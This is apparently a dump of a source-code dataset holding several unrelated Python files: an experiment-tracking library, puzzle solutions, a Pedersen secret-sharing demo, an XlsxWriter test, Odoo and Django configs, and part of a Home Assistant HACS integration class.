:param keep_record: Keep the folder that results are saved into.
True: Results are saved into a folder
False: Results folder is deleted at the end.
None: If "test_mode" is true, then delete results at end, otherwise save them.
:param raise_exceptions: True to raise any exception that occurs when running the experiment. False to catch it,
print the error, and move on.
:param experiment_record_kwargs: Passed to the "record_experiment" context.
:return: The ExperimentRecord object, if keep_record is true, otherwise None
"""
for exp_rec in self.iterator(print_to_console=print_to_console, show_figs=show_figs, test_mode=test_mode, keep_record=keep_record,
raise_exceptions=raise_exceptions, display_results=display_results, notes=notes, **experiment_record_kwargs):
pass
return exp_rec
def iterator(self, print_to_console=True, show_figs=None, test_mode=None, keep_record=None, raise_exceptions=True,
display_results=False, notes = (), **experiment_record_kwargs):
if keep_record is None:
keep_record = keep_record_by_default if keep_record_by_default is not None else not test_mode
exp_rec = None
for exp_rec in run_and_record(
function = self.function,
experiment_id=self.name,
print_to_console=print_to_console,
show_figs=show_figs,
test_mode=test_mode,
keep_record=keep_record,
raise_exceptions=raise_exceptions,
notes=notes,
**experiment_record_kwargs
):
yield exp_rec
assert exp_rec is not None, 'Should nevah happen.'
if display_results:
self.show(exp_rec)
return
def _create_experiment_variant(self, args, kwargs, is_root):
# TODO: For non-root variants, assert that all args are defined
assert len(args) in (0, 1), "When creating an experiment variant, you can either provide one unnamed argument (the experiment name), or zero, in which case the experiment is named after the named argumeents. See add_variant docstring"
name = args[0] if len(args) == 1 else _kwargs_to_experiment_name(kwargs)
assert isinstance(name, str), 'Name should be a string. Not: {}'.format(name)
assert name not in self.variants, 'Variant "%s" already exists.' % (name,)
assert '/' not in name, 'Experiment names cannot have "/" in them: {}'.format(name)
ex = Experiment(
name=self.name + '.' + name,
function=partial(self.function, **kwargs),
show=self._show,
compare=self._compare,
one_liner_function=self.one_liner_function,
result_parser=self._result_parser,
is_root=is_root
)
self.variants[name] = ex
return ex
def add_variant(self, variant_name = None, **kwargs):
"""
Add a variant to this experiment, and register it on the list of experiments.
There are two ways you can do this:
.. code-block:: python
# Name the experiment explicitely, then list the named arguments
my_experiment_function.add_variant('big_a', a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.big_a'
# Allow the experiment to be named automatically, and just list the named arguments
my_experiment_function.add_variant(a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.a=10000'
:param variant_name: Optionally, the name of the experiment
:param kwargs: The named arguments which will differ from the base experiment.
:return Experiment: The experiment.
"""
return self._create_experiment_variant(() if variant_name is None else (variant_name, ), kwargs, is_root=False)
def add_root_variant(self, variant_name=None, **kwargs):
"""
Add a variant to this experiment, but do NOT register it on the list of experiments.
There are two ways you can do this:
.. code-block:: python
# Name the experiment explicitely, then list the named arguments
my_experiment_function.add_root_variant('big_a', a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.big_a'
# Allow the experiment to be named automatically, and just list the named arguments
my_experiment_function.add_root_variant(a=10000)
assert my_experiment_function.get_name()=='my_experiment_function.a=10000'
:param variant_name: Optionally, the name of the experiment
:param kwargs: The named arguments which will differ from the base experiment.
:return Experiment: The experiment.
"""
return self._create_experiment_variant(() if variant_name is None else (variant_name, ), kwargs, is_root=True)
def copy_variants(self, other_experiment):
"""
Copy over the variants from another experiment.
:param other_experiment: An Experiment Object
"""
base_args = other_experiment.get_args()
for variant in other_experiment.get_variants():
if variant is not self:
variant_args = variant.get_args()
different_args = {k: v for k, v in variant_args.items() if base_args[k]!=v}
name_diff = variant.get_id()[len(other_experiment.get_id())+1:]
v = self.add_variant(name_diff, **different_args)
v.copy_variants(variant)
def _add_config(self, name, arg_constructors, is_root):
assert isinstance(name, str), 'Name should be a string. Not: {}'.format(name)
assert name not in self.variants, 'Variant "%s" already exists.' % (name,)
assert '/' not in name, 'Experiment names cannot have "/" in them: {}'.format(name)
configured_function = partial_reparametrization(self.function, **arg_constructors)
ex = Experiment(
name=self.name + '.' + name,
function=configured_function,
show=self._show,
compare=self._compare,
one_liner_function=self.one_liner_function,
is_root=is_root
)
self.variants[name] = ex
return ex
def add_config_variant(self, name, **arg_constructors):
"""
Add a variant where you redefine the constructor for arguments to the experiment. e.g.
@experiment_function
def demo_smooth_out_signal(smoother, signal):
y = [smoother.update(xt) for xt in signal]
plt.plot(y)
return y
demo_average_sequence.add_config_variant('exp_smooth', averager = lambda decay=0.1: ExponentialMovingAverage(decay))
This creates a variant "exp_smooth" which can be parameterized by a "decay" argument.
:param name: Name of the variant
:param kwargs: The constructors for the arguments which you'd like to configure.
:return: A new experiment.
"""
return self._add_config(name, arg_constructors=arg_constructors, is_root=False)
def add_config_root_variant(self, name, **arg_constructors):
"""
Add a config variant which requires additional parametrization. (See add_config_variant)
"""
return self._add_config(name, arg_constructors=arg_constructors, is_root=True)
def get_id(self):
"""
:return: A string uniquely identifying this experiment.
"""
return self.name
def get_variant(self, variant_name=None, **kwargs):
"""
Get a variant on this experiment.
:param str variant_name: The name of the variant, if it has one
:param kwargs: Otherwise, the named arguments which were used to define the variant.
:return Experiment: An Experiment object
"""
if variant_name is None:
variant_name = _kwargs_to_experiment_name(kwargs)
else:
assert len(kwargs)==0, 'If you provide a variant name ({}), there is no need to specify the keyword arguments. ({})'.format(variant_name, kwargs)
assert variant_name in self.variants, "No variant '{}' exists. Existing variants: {}".format(variant_name, list(self.variants.keys()))
return self.variants[variant_name]
def get_records(self, only_completed=False):
"""
Get all records associated with this experiment.
:param only_completed: Only include records that have run to completion.
:return: A list of ExperimentRecord objects.
"""
records = [load_experiment_record(rid) for rid in experiment_id_to_record_ids(self.name)]
if only_completed:
records = [record for record in records if record.get_status()==ExpStatusOptions.FINISHED]
return records
def browse(self, command=None, catch_errors = False, close_after = False, filterexp=None, filterrec = None,
view_mode ='full', raise_display_errors=False, run_args=None, keep_record=True, truncate_result_to=100,
cache_result_string = False, remove_prefix = None, display_format='nested', **kwargs):
"""
Open up the UI, which allows you to run experiments and view their results.
:param command: Optionally, a string command to pass directly to the UI. (e.g. "run 1")
:param catch_errors: Catch errors that arise while running experiments
:param close_after: Close after issuing one command.
:param filterexp: Filter the experiments with this selection (see help for how to use)
:param filterrec: Filter the experiment records with this selection (see help for how to use)
:param view_mode: How to view experiments {'full', 'results'} ('results' leads to a narrower display).
:param raise_display_errors: Raise errors that arise when displaying the table (otherwise just indicate that display failed in table)
:param run_args: A dict of named arguments to pass on to Experiment.run
:param keep_record: Keep a record of the experiment after running.
:param truncate_result_to: An integer, indicating the maximum length of the result string to display.
:param cache_result_string: Cache the result string (useful when it takes a very long time to display the results
when opening up the menu - often when results are long lists).
:param remove_prefix: Remove the common prefix on the experiment ids in the display.
:param display_format: How experements and their records are displayed: 'nested' or 'flat'. 'nested' might be
better for narrow console outputs.
"""
from artemis.experiments.ui import ExperimentBrowser
experiments = get_ordered_descendents_of_root(root_experiment=self)
browser = ExperimentBrowser(experiments=experiments, catch_errors=catch_errors, close_after=close_after,
filterexp=filterexp, filterrec=filterrec, view_mode=view_mode, raise_display_errors=raise_display_errors,
run_args=run_args, keep_record=keep_record, truncate_result_to=truncate_result_to, cache_result_string=cache_result_string,
remove_prefix=remove_prefix, display_format=display_format, **kwargs)
browser.launch(command=command)
# Above this line is the core api....
# -----------------------------------
# Below this line are a bunch of convenience functions.
def has_record(self, completed=True, valid=True):
"""
Return true if the experiment has a record, otherwise false.
:param completed: Check that the record is completed.
:param valid: Check that the record is valid (arguments match current experiment arguments)
:return: True/False
"""
records = self.get_records(only_completed=completed)
if valid:
records = [record for record in records if record.args_valid()]
return len(records)>0
def get_variants(self):
return self.variants.values()
def get_all_variants(self, include_roots=False, include_self=True):
"""
Return a list of variants of this experiment
:param include_roots: Include "root" experiments
:param include_self: Include this experiment (unless include_roots is false and this this experiment is a root)
:return: A list of experiments.
"""
variants = []
if include_self and (not self.is_root or include_roots):
variants.append(self)
for name, v in self.variants.items():
variants += v.get_all_variants(include_roots=include_roots, include_self=True)
return variants
def test(self, **kwargs):
self.run(test_mode=True, **kwargs)
def get_latest_record(self, only_completed=False, if_none = 'skip'):
"""
Return the ExperimentRecord from the latest run of this Experiment.
:param only_completed: Only search among records of that have run to completion.
:param if_none: What to do if no record exists. Options are:
'skip': Return None
'err': Raise an exception
'run': Run the experiment to get the record
:return ExperimentRecord: An ExperimentRecord object
"""
assert if_none in ('skip', 'err', 'run')
records = self.get_records(only_completed=only_completed)
if len(records)==0:
if if_none=='run':
return self.run()
elif if_none=='err':
raise Exception('No{} records for experiment "{}"'.format(' completed' if only_completed else '', self.name))
else:
return None
else:
return sorted(records, key=lambda x: x.get_id())[-1]
def get_variant_records(self, only_completed=False, only_last=False, flat=False):
"""
Get the collection of records associated with all variants of this Experiment.
:param only_completed: Only search among records of that have run to completion.
:param only_last: Just return the most recent record.
:param flat: Just return a list of records
:return: if not flat (default) An OrderedDict<experiment_id: ExperimentRecord>.
otherwise, if flat: a list<ExperimentRecord>
"""
variants = self.get_all_variants(include_self=True)
if only_last:
exp_record_dict = OrderedDict((ex.name, ex.get_latest_record(only_completed=only_completed, if_none='skip')) for ex in variants)
if flat:
return [record for record in exp_record_dict.values() if record is not None]
else:
return exp_record_dict
else:
exp_record_dict = OrderedDict((ex.name, ex.get_records(only_completed=only_completed)) for ex in variants)
if flat:
return [record for records in exp_record_dict.values() for record in records]
else:
return exp_record_dict
def add_parameter_search(self, name='parameter_search', fixed_args = {}, space = None, n_calls=None, search_params = None, scalar_func=None):
"""
:param name: Name of the Experiment to be created
:param dict[str, Any] fixed_args: Any fixed-arguments to provide to all experiments.
:param dict[str, skopt.space.Dimension] space: A dict mapping param name to Dimension.
e.g. space=dict(a = Real(1, 100, 'log-uniform'), b = Real(1, 100, 'log-uniform'))
:param Callable[[Any], float] scalar_func: Takes the return value of the experiment and turns it into a scalar
which we aim to minimize.
:param dict[str, Any] search_params: Args passed to parameter_search
:return Experiment: A new experiment which runs the search and yields current-best parameters with every iteration.
"""
assert space is not None, "You must specify a parameter search space. See this method's documentation"
if name is None: # TODO: Set name=None in the default after deadline
name = 'parameter_search[{}]'.format(','.join(space.keys()))
if search_params is None:
search_params = {}
def objective(**current_params):
output = self.call(**current_params)
if scalar_func is not None:
output = scalar_func(output)
return output
from artemis.experiments import ExperimentFunction
def search_func(fixed):
n_calls_to_make = n_calls if n_calls is not None else 3 if is_test_mode() else 100
this_objective = partial(objective, **fixed)
for iter_info in parameter_search(this_objective, n_calls=n_calls_to_make, space=space, **search_params):
info = dict(names=list(space.keys()), x_iters =iter_info.x_iters, func_vals=iter_info.func_vals, score = iter_info.func_vals, x=iter_info.x, fun=iter_info.fun)
latest_info = {name: val for name, val in izip_equal(info['names'], iter_info.x_iters[-1])}
print('Latest: {}, Score: {:.3g}'.format(latest_info, iter_info.func_vals[-1]))
yield info
# The following is a hack to dynamically create a function with the given args
# arg_string = ', '.join('{}={}'.format(k, v) for k, v in fixed_args.items())
# param_search = None
# exec('global param_search\ndef func({fixed}): search_func(fixed_args=dict({fixed})); param_search=func'.format(fixed=arg_string))
# param_search = locals()['param_search']
search_exp_func = partial(search_func, fixed=fixed_args) # We do this so that the fixed parameters will be recorded and we will see if they changed.
search_exp = ExperimentFunction(name = self.name + '.'+ name, show = show_parameter_search_record, one_liner_function=parameter_search_one_liner)(search_exp_func)
self.variants[name] = search_exp
search_exp.tag('psearch') # Secret feature that makes it easy to select all parameter experiments in ui with "filter tag:psearch"
return search_exp
def tag(self, tag):
"""
Add a "tag" - a string identifying the experiment as being in some sort of group.
You can use tags in the UI with 'filter tag:my_tag' to select experiments with a given tag
:param tag:
:return:
"""
self._tags.add(tag)
return self
def get_tags(self):
return self._tags
def show_parameter_search_record(record):
from tabulate import tabulate
result = record.get_result()
table = tabulate([list(xs)+[fun] for xs, fun in zip(result['x_iters'], result['func_vals'])], headers=list(result['names'])+['score'])
print(table)
def parameter_search_one_liner(result):
return '{} Runs : '.format(len(result["x_iters"])) + ', '.join('{}={:.3g}'.format(k, v) for k, v in izip_equal(result['names'], result['x'])) + ' : Score = {:.3g}'.format(result["fun"])
_GLOBAL_EXPERIMENT_LIBRARY = OrderedDict()
class ExperimentNotFoundError(Exception):
def __init__(self, experiment_id):
Exception.__init__(self,'Experiment "{}" could not be loaded, either because it has not been imported, or its definition was removed.'.format(experiment_id))
def clear_all_experiments():
_GLOBAL_EXPERIMENT_LIBRARY.clear()
@contextmanager
def capture_created_experiments():
"""
A convenient way to cross-breed experiments. If you define experiments in this block, you can capture them for
later use (for instance by modifying them). e.g.:
.. code-block:: python
@experiment_function
def add_two_numbers(a=1, b=2):
return a+b
with capture_created_experiments() as exps:
add_two_numbers.add_variant(a=3)
for ex in exps:
ex.add_variant(b=4)
:rtype: Generator[:class:`Experiment`]
"""
current_len = len(_GLOBAL_EXPERIMENT_LIBRARY)
new_experiments = []
yield new_experiments
for ex in list(_GLOBAL_EXPERIMENT_LIBRARY.values())[current_len:]:
new_experiments.append(ex)
def _register_experiment(experiment):
assert experiment.name not in _GLOBAL_EXPERIMENT_LIBRARY, 'You have already registered an experiment named {} in {}'.format(experiment.name, inspect.getmodule(experiment.get_root_function()).__name__)
_GLOBAL_EXPERIMENT_LIBRARY[experiment.name] = experiment
def get_nonroot_global_experiment_library():
return OrderedDict((name, exp) for name, exp in _GLOBAL_EXPERIMENT_LIBRARY.items() if not exp.is_root)
def get_ordered_descendents_of_root(root_experiment):
"""
:param Experiment root_experiment: An experiment which has variants
:return List[Experiment]: A list of the descendents (i.e. variants and subvariants) of the root experiment, in the
order in which they were created
"""
descendents_of_root = set(ex for ex in root_experiment.get_all_variants(include_self=True))
return [ex for ex in get_nonroot_global_experiment_library().values() if ex in descendents_of_root]
def get_experiment_info(name):
experiment = load_experiment(name)
return str(experiment)
def load_experiment(experiment_id):
try:
return _GLOBAL_EXPERIMENT_LIBRARY[experiment_id]
except KeyError:
raise ExperimentNotFoundError(experiment_id)
def is_experiment_loadable(experiment_id):
assert isinstance(experiment_id, string_types), 'Expected a string for experiment_id, not {}'.format(experiment_id)
return experiment_id in _GLOBAL_EXPERIMENT_LIBRARY
def _kwargs_to_experiment_name(kwargs):
string = ','.join('{}={}'.format(argname, kwargs[argname]) for argname in sorted(kwargs.keys()))
string = string.replace('/', '_SLASH_')
return string
@contextmanager
def hold_global_experiment_libary(new_lib = None):
if new_lib is None:
new_lib = OrderedDict()
global _GLOBAL_EXPERIMENT_LIBRARY
oldlib = _GLOBAL_EXPERIMENT_LIBRARY
_GLOBAL_EXPERIMENT_LIBRARY = new_lib
yield _GLOBAL_EXPERIMENT_LIBRARY
_GLOBAL_EXPERIMENT_LIBRARY = oldlib
def get_global_experiment_library():
return _GLOBAL_EXPERIMENT_LIBRARY
keep_record_by_default = None
@contextmanager
def experiment_testing_context(close_figures_at_end = True, new_experiment_lib = False):
"""
Use this context when testing the experiment/experiment_record infrastructure.
Should only really be used in test_experiment_record.py
"""
ids = get_all_record_ids()
global keep_record_by_default
old_val = keep_record_by_default
keep_record_by_default = True
if new_experiment_lib:
with hold_global_experiment_libary():
yield
else:
yield
keep_record_by_default = old_val
if close_figures_at_end:
from matplotlib import pyplot as plt
plt.close('all')
def clean_on_close():
new_ids = set(get_all_record_ids()).difference(ids)
clear_experiment_records(list(new_ids))
atexit.register(clean_on_close) # We register this on exit to avoid race conditions with system commands when we open figures externally
| [
"[email protected]"
] | |
76dbaf4b89ba0644af07d6d0fb1df5416f4fe855 | 16631cf7cd4a70f2cd2750851649d3eff5e17724 | /2015/day19/part1.py | 20687aa134135898c045654106d8f4e7b87ac77d | [] | no_license | kynax/AdventOfCode | 1dd609a3308d733f2dd7d4ea00508d2da73180b9 | 36a339241dd7a31ebe08a73e5efa599e5faeea1a | refs/heads/master | 2022-12-21T13:32:52.591068 | 2022-12-16T22:41:30 | 2022-12-16T22:41:30 | 48,439,585 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 891 | py | import sys
mol = 'CRnSiRnCaPTiMgYCaPTiRnFArSiThFArCaSiThSiThPBCaCaSiRnSiRnTiTiMgArPBCaPMgYPTiRnFArFArCaSiRnBPMgArPRnCaPTiRnFArCaSiThCaCaFArPBCaCaPTiTiRnFArCaSiRnSiAlYSiThRnFArArCaSiRnBFArCaCaSiRnSiThCaCaCaFYCaPTiBCaSiThCaSiThPMgArSiRnCaPBFYCaCaFArCaCaCaCaSiThCaSiRnPRnFArPBSiThPRnFArSiRnMgArCaFYFArCaSiRnSiAlArTiTiTiTiTiTiTiRnPMgArPTiTiTiBSiRnSiAlArTiTiRnPMgArCaFYBPBPTiRnSiRnMgArSiThCaFArCaSiThFArPRnFArCaSiRnTiBSiThSiRnSiAlYCaFArPRnFArSiThCaFArCaCaSiThCaCaCaSiRnPRnCaFArFYPMgArCaPBCaPBSiRnFYPBCaFArCaSiAl'
#mol = 'ZZSiZZZZSiZSiZZSi'
#mol = 'HOHOHO'
res = []
repl = []
for line in sys.stdin:
words = line.split()
repl.append((words[0],words[2]))
c = 0
for (key,val) in repl:
cur = mol
pre = ''
while(key in cur):
i = cur.index(key)
out = pre + cur.replace(key,val,1)
pre += cur[:i+1]
cur = cur[i+1:]
res.append(out)
# if i == len(cur)-1:
# break
print(len(set(res))) | [
"[email protected]"
] | |
1c35de4f84d46d2c3defc2f8ec85426949e56c02 | 97e60d0ca572d0dc3fc80f8719cd57a707ab6069 | /bias_account_report_v6/__openerp__.py | 6349817b455c8fc304e48597e462c7badb0b10a8 | [] | no_license | josepato/bias_trunk_v6 | 0c7c86493c88f015c049a139360478cabec7f698 | b6ab6fc2ff3dc832f26effdba421bcc76d5cabac | refs/heads/master | 2020-06-12T14:18:31.101513 | 2016-12-15T22:55:54 | 2016-12-15T22:55:54 | 75,803,957 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,724 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>). All Rights Reserved
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Bias Account Custom Report',
'version': '1.0',
'category': 'Generic Modules/Account',
'description': """ Add custom report capabilities """,
'author': 'BIAS',
'depends': ['account', 'bias_fiscal_statements_v6'],
'update_xml': [
'security/ir.model.access.csv',
'custom_report_view.xml',
'custom_report_wizard.xml',
'financial_reports_wizard.xml',
'financial_reports_report.xml',
'custom_report_report.xml',
],
'installable': True,
'active': False,
# 'certificate': '0048234520147',
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"[email protected]"
] | |
15f8cd0d04070fe3d412a6539a5235a6a8ef6c98 | da19363deecd93a73246aaea877ee6607daa6897 | /xlsxwriter/test/worksheet/test_write_filter.py | bfe6d60fc98f85a51ac98245e67242f2736abce1 | [] | no_license | UNPSJB/FarmaciaCrisol | 119d2d22417c503d906409a47b9d5abfca1fc119 | b2b1223c067a8f8f19019237cbf0e36a27a118a6 | refs/heads/master | 2021-01-15T22:29:11.943996 | 2016-02-05T14:30:28 | 2016-02-05T14:30:28 | 22,967,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
import unittest
from ...compatibility import StringIO
from ...worksheet import Worksheet
class TestWriteFilter(unittest.TestCase):
"""
Test the Worksheet _write_filter() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_filter(self):
"""Test the _write_filter() method"""
self.worksheet._write_filter('East')
exp = """<filter val="East"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
| [
"[email protected]"
] | |
9db96c6dbb62656d25dbde9c5f8ba667c8585fa8 | 3817a595bdf246996c1f3846860cea9a9154f1cc | /AltviaDogs/apps.py | 6e7c68cfaf6935515b6abbaa873e7c0dd3d098b0 | [] | no_license | shedwyn/AltviaDogs | 99e83f217d891c5060d0b9a8f0997ea4ea2c5dc2 | 150078897d38c84ac3c492635ea777476e84b0d9 | refs/heads/master | 2021-01-24T00:32:32.176410 | 2018-08-24T20:01:47 | 2018-08-24T20:01:47 | 122,768,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | """
Designed and built by Erin 'Ernie' L. Fough.
June 2018 (start)
contact: [email protected]
want to know when this was last updated? See README.md.
"""
from django.apps import AppConfig
class AltviaDogsConfig(AppConfig):
"""Establish Link to Dog Manager (AltviaDogs) Application."""
name = 'AltviaDogs'
| [
"[email protected]"
] | |
23bcdebc6312f35fb67216dff2380ccbe74890ab | 68215f224dd76f8bf299c66c80cb4a0de1a05a20 | /PythonTutorial/Advance/MetaClass/meta_class_example2.py | 2e013f02ffac5c75fa0acaf6a410b099a0bd7425 | [] | no_license | jhappye/Python-Study | 3935e1d9ffead3afb1b39823a4114006094a6542 | 40a421980e9f56a97f6f7b9eb00bbf983ee12c5b | refs/heads/master | 2023-08-30T17:36:26.313896 | 2021-11-16T09:53:39 | 2021-11-16T09:53:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 226 | py | # 常规方法创建
class Foo:
pass
# 常规方法创建
class Bar(Foo):
attr = 100
x = Foo()
print(x)
# 动态创建,和上面等价
Bar = type('Bar', (Foo,), dict(attr=100))
x = Bar()
print(x)
print(type(x))
| [
"[email protected]"
] | |
76a14a2500ada13704b7d69ed40d39c206497011 | 680db028bdfd570688e66009dd41a424b2395a6e | /Camelcase.py | 51a76dd0a42b6afcae6e169004a153a3dac0257b | [] | no_license | vitcmaestro/player | 46fcf3138a7ba98a3aadae60aebdd68efdd16c55 | 8b9b132ec5f3dfe22521daf6122431451db8d880 | refs/heads/master | 2020-04-15T16:43:53.944347 | 2019-01-20T05:00:31 | 2019-01-20T05:00:31 | 164,848,284 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | str1 = input("")
str2 =""
for i in range(len(str1)):
if(i==0):
str2 +=str1[i].upper()
elif(str1[i-1].isspace()):
str2 +=str1[i].upper()
else:
str2 +=str1[i]
print(str2)
| [
"[email protected]"
] | |
149488d35576cf1a5937c6f95ae55ab3c88828d9 | 837d683ccf6aa08b0ad6d95f6af47fcc12b72da3 | /pedersen_vss.py | 586d0dff4ce73808e4596e669d77272e83f15f10 | [] | no_license | froyobin/secretsharing | deef2cdb9be72ff51be339bfaae4822e351b8cf1 | 737f2aa074e0cb6f082916bd11afc658732777e1 | refs/heads/master | 2021-01-11T21:32:12.720629 | 2017-01-20T00:46:31 | 2017-01-20T00:46:31 | 78,798,569 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,479 | py | import argparse
import shamir_secret_sharing
from Crypto.Util import number
#To make it simple, we give the f(X)=5+3x+8x^2 as params. It is easy to do
# the test and write the code.
p = int(
"FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF",
16)
g = 2
h = int(
"3d941d6d9cd4c77719840d6b391a63ca6ded5b5cf6aafeefb9ea530f523039e9c372736a79b7eb022e50029f7f2cb4fb16fd1def75657288eca90d2c880f306be76fe0341b3c8961ae6e61aabbb60e416069d97eeada2f1408f2017449dddcd5ac927f164b1a379727941bd7f2170d02ef12ef3ec801fae585ac7b9d4079f50feced64687128208d46e3e10c5d78eb05832f5322c07a3b4e14c6f595206fde99115e8eea19b5fb13dd434332ec3eccb41a4baa54a14183c3416313678697db8507abdcfc6a97c86099fa5172316d784c6997fc2e74e8e59c7c1bc90426164682f5bfbf6373b13ea90d7e13fbffd65e10c4ad96c38ccbf8e8def28d76746729dc",
16)
def create_verifies(params1, params2, p, g, h):
verifies = []
for i in range(0, len(params1)):
verifies.append((pow(g, params1[i], p) * pow(h, params2[i], p)) % p)
return verifies
def verify_each(i, verifies, len_pamras):
left_value = 1
for j in range(0, len_pamras):
upper = pow(i, j, p)
left_value *= pow(verifies[j], upper, p)
def calculate_left(verfies, i, t, p):
powerall = [1]
for each_t in range(1, t):
powerall.append(pow(i, each_t))
left_val = 1
for j in range(0, len(verfies)):
c = pow(verfies[j], powerall[j], p)
left_val *= c
left_val %= p
return left_val % p
def verifies_shares(secrets1, secrets2, verifies, params,p,g):
for i in range(0, len(secrets1)):
left_value = calculate_left(verifies, i+1, len(params), p)
right_value = (pow(g, (secrets1[i])%p, p)*pow(h, (secrets2[i])%p, p))%p
if left_value == right_value:
print "checking %d Successfully!!" % i
else:
print "secret %d has been modified!!" % i
def test_prime():
n_length = 2048
q= (p-1)%2
print q
print number.isPrime((p-1)/2)
primeNum1 = number.getPrime(n_length)
# primeNum2 = number.getStrongPrime(n_length, primeNum1)
i=2
while True:
pl = p-1
print i
if pl%i == 0:
if number.isPrime(pl / i):
print "############"
print i
print "############"
break
i += 1
if i==10000:
break
print "found!!"
print "############################"
print primeNum1
print "############################"
def main(args):
s = shamir_secret_sharing.StringtoInt(args.secret)
parties = int(args.party)
min_party = int(args.min_party)
params1 = shamir_secret_sharing.create_params(s, min_party, p)
params2 = shamir_secret_sharing.create_params(s, min_party, p)
secrets1 = shamir_secret_sharing.create_secret(parties, params1, p)
secrets2 = shamir_secret_sharing.create_secret(parties, params2, p)
secret = shamir_secret_sharing.construct_secret(secrets1, min_party, p)
verifies = create_verifies(params1, params2, p, g, h)
verifies_shares(secrets1, secrets2, verifies, params2, p, g)
print "The secret you give is " + str(params1[0]) + "\n"
print "The rejoin code is " + str(secret)
if params1[0] == secret:
print "rejoin Successfully!!"
else:
print "we cannot rejoin the secret"
#We change secret2 3's secret and see whether we can check it out
secrets2[3] -= 1
verifies_shares(secrets1, secrets2, verifies, params2, p, g)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Create secret shares')
parser.add_argument('secret', metavar='\"secret\"', type=str,
help='the secret to share')
parser.add_argument('party', metavar='\"secret\"', type=str,
help='the secret to share')
parser.add_argument('min_party', metavar='\"secret\"', type=str,
help='the secret to share')
args = parser.parse_args()
main(args)
| [
"[email protected]"
] | |
32e1da53f66f709ec826c5e6e98b69f964055011 | 644bcdabf35261e07c2abed75986d70f736cb414 | /python-project/Defis/Euler_44_Test.py | 059d736f3c4546ec361ff33f1fc9b32183c5bd48 | [] | no_license | matcianfa/playground-X1rXTswJ | f967ab2c2cf3905becafb6d77e89a31414d014de | 67859b496e407200afb2b1d2b32bba5ed0fcc3f0 | refs/heads/master | 2023-04-03T11:56:15.878757 | 2023-03-24T15:52:37 | 2023-03-24T15:52:37 | 122,226,979 | 5 | 20 | null | null | null | null | UTF-8 | Python | false | false | 1,110 | py | #Ne pas oublier de changer le module à importer
module="Defis/Euler_44"
import sys
import io
#On récupère les données de l'utilisateur
sauvegarde_stdout=sys.stdout
sys.stdout=io.StringIO()
from Euler_44 import *
count1 = sys.stdout.getvalue()[:-1]
sys.stdout=sauvegarde_stdout
from ma_bao import *
#La réponse
reponse=5482660
#message d'aide si besoin
help="N'oublie pas d'utiliser print pour afficher le resultat"
def send_msg(channel, msg):
print("TECHIO> message --channel \"{}\" \"{}\"".format(channel, msg))
def success():
send_msg("Tests validés","Bravo !")
afficher_correction(module)
print("TECHIO> success true")
def fail():
print("TECHIO> success false")
def test():
try:
assert str(count1) == str(reponse), "Le résultat obtenu est {} mais ce n'est pas le bon.".format(str(count1))
send_msg("Tests validés","Le résultat cherché est bien {}".format(str(count1)))
success()
except AssertionError as e:
fail()
send_msg("Oops! ", e)
if help:
send_msg("Aide 💡", help)
if __name__ == "__main__": test()
| [
"[email protected]"
] | |
07e8af6fb34efbf28fd13da8b7998358fa68674c | f9c2e53c48839fe5583f6da48e800eba793f83c8 | /custom_components/hacs/repositories/integration.py | 8470873279f13b52e25cd0fb77a631d30b168ab2 | [] | no_license | Bobo2012/homeassistant-config | d6a5ebdd8de978d14a5d060ad77975280efdf95e | ee2567182e3ef250ee2a2e1a403fbc6f27057861 | refs/heads/master | 2020-08-21T20:04:53.531610 | 2019-10-18T22:59:54 | 2019-10-18T22:59:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,501 | py | """Class for integrations in HACS."""
import json
from aiogithubapi import AIOGitHubException
from homeassistant.loader import async_get_custom_components
from .repository import HacsRepository, register_repository_class
@register_repository_class
class HacsIntegration(HacsRepository):
"""Integrations in HACS."""
category = "integration"
def __init__(self, full_name):
"""Initialize."""
super().__init__()
self.information.full_name = full_name
self.information.category = self.category
self.manifest = None
self.domain = None
self.content.path.remote = "custom_components"
self.content.path.local = self.localpath
@property
def localpath(self):
"""Return localpath."""
return f"{self.system.config_path}/custom_components/{self.domain}"
@property
def config_flow(self):
"""Return bool if integration has config_flow."""
if self.manifest is not None:
if self.information.full_name == "custom-components/hacs":
return False
return self.manifest.get("config_flow", False)
return False
async def validate_repository(self):
"""Validate."""
await self.common_validate()
# Attach repository
if self.repository_object is None:
